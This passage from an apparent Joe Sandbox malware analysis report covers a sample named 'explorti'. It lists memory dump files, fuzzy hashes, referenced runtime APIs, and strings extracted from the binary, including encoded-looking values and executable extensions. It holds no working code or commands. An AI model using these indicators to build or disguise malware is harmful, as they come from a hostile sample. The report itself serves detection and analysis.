                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6294245878ef9b282f0b4cce51cb6f06b184ac442c6b01beb903f19cbfd6df4
                      • Instruction ID: d38aca423a636196750a936d27d8f34d5008d59314d906c28920cb8ae34cf8c4
                      • Opcode Fuzzy Hash: c6294245878ef9b282f0b4cce51cb6f06b184ac442c6b01beb903f19cbfd6df4
                      • Instruction Fuzzy Hash: B9E0C2316406087FCF3ABF14CB0CD893B6AEF51340F04C810F85446221CB76ED81CA80
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: abc0a55cba83a659f4df4b3744514deb12826216cea926dab9080cf599f3069f
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: E0E0B672925238EBCB25DB988A44D8AF2ACEB49B50F554596B501D3251C270DF00C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-3273830296
                      • Opcode ID: 8c827c550984b874e1cd5b0eed9321c4bfb8a9d3c25baef6b500f1b8b72efb56
                      • Instruction ID: 3a4ce644ae71684d356043487d0acf35fa6257bf21f51908a2ecd0caffd13492
                      • Opcode Fuzzy Hash: 8c827c550984b874e1cd5b0eed9321c4bfb8a9d3c25baef6b500f1b8b72efb56
                      • Instruction Fuzzy Hash: AA02CF71A00248EFEF14EFA8C949BDEBBB5EF05304F504558E805A7282D7759A85CFA1
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 00A347A7
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00A347AF
                      • _ValidateLocalCookies.LIBCMT ref: 00A34838
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A34863
                      • _ValidateLocalCookies.LIBCMT ref: 00A348B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 660dfd2d591620bb8a2b6044c1c1989fd4132a846914bc046dde8cfbfc66358b
                      • Instruction ID: 293ac6a9b657363c106e578ee6d59bc9f38bd33ffd3045b89a35849b1b225f77
                      • Opcode Fuzzy Hash: 660dfd2d591620bb8a2b6044c1c1989fd4132a846914bc046dde8cfbfc66358b
                      • Instruction Fuzzy Hash: 8651A435A00248ABCF10DF68C885AAEBBB5BF49318F148195F8149B352D732FE55CB90
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: dc0a46f866a20946e0a08f85ed3724e4b9b650b9f46e659692dffa0d344267c8
                      • Instruction ID: 929f8fb9c69165b4b4caf5af75f6b606649267161e4b87cc8edaeb9f03374d18
                      • Opcode Fuzzy Hash: dc0a46f866a20946e0a08f85ed3724e4b9b650b9f46e659692dffa0d344267c8
                      • Instruction Fuzzy Hash: 9201FE7761861676663865199D0373F1799ABC3BB4F15012BFE44F73C2DF54DC0242A0
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 811fb20d4a3ad2d89ba89991eae9a1adbbdf83c1d2c18982bc36a625563e9741
                      • Instruction ID: 4d32bfd75e1c01c2751d13e725f90f8ccbe891e13c95e04dfc24e1e7c0c2f767
                      • Opcode Fuzzy Hash: 811fb20d4a3ad2d89ba89991eae9a1adbbdf83c1d2c18982bc36a625563e9741
                      • Instruction Fuzzy Hash: 34A124B194130AAFDF11DF64D9457AAB7B8FF04364F008229E815D7281EB34EA54CBD1
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                      • Instruction ID: 61e66d836cd4941feb3ad1313832b66b34279e7f64ff0c3c6dfb387156b17059
                      • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                      • Instruction Fuzzy Hash: 99B105329002859FDB15CF69CC817AEBBF5EF55360F1481AAF845BB342D6389D41CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: b8aee1c6bebaa802e0236c054b0aa75ff96961f7a695fdb44b9535ae0f2c2fb5
                      • Instruction ID: 369bb733056b007fa723caa9e9fa4bf89fa0d225e24dd8d5c399f9e9c48b1c59
                      • Opcode Fuzzy Hash: b8aee1c6bebaa802e0236c054b0aa75ff96961f7a695fdb44b9535ae0f2c2fb5
                      • Instruction Fuzzy Hash: 9C215175A41219AFDF10EFA4CD419FEBBB9EF08724F000069F601A7291DB34AD818BA1